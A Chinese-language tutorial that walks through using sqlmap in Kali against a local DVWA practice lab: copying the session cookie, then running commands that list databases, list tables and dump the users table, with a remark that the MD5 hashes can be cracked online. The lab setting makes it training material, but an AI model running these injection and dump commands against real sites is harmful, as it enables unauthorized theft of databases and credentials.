SqlMap简介:sqlmap是一款自动化的sql注入测试工具,可更加简介的验证和利用sql注入漏洞,并且能对一些限制进行绕过,kali中已经集成了sqlmap。
首先搭建好我们的dvwa,进行登录
将漏洞等级调整到低级
选择SQL Injection并在输入框中输入要查询的UserId:
点击Submit提交后查询出结果并拿到url地址
下面打开kali 打开命令行界面
输入 sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" 双引号中就是刚刚的url地址 ,注意,这里的ip也就是127.0.0.1需要换成你安装dvwa的主机上的ip,可使用ipconfig查询
由于dvwa是登录之后才能进行,所以需要给sqlmap一个登录凭证(cookie),证明已经登录过,不需要再进行登录操作,在刚刚dvwa页面中按F12打开开发者工具,并点击网络,没有网络选项的可点击>>找到
此时点击网页刷新按钮页面会出现刚刚url的一些请求信息
单击之后找到cookie
复制该cookie,然后再kali中刚刚输入的命令后面加上--cookie,也就是sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="你的cookie" 注意kali中不能使用ctrl+v 可使用鼠标右键再点击paste selection,输入完成之后直接回车运行
一下这些就是改注入点暴露的一些sql注入漏洞
若想查询数据库信息可在刚刚的命令后加上--dbs
sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6j8usjnm4v4i8mr3c9k9erdoqt" --dbs
回车执行查到数据库相关信息
并可使用-D选择数据库来查询表信息
sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6j8usjnm4v4i8mr3c9k9erdoqt" -D dvwa --tables
查询字段具体内容可在后面加入--dump
sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6j8usjnm4v4i8mr3c9k9erdoqt" -D dvwa -T users --dump
图中涉及到md5加密可在线解密
以上是kali中sqlmap的简单试用,跟windows中sqlmap的使用类似。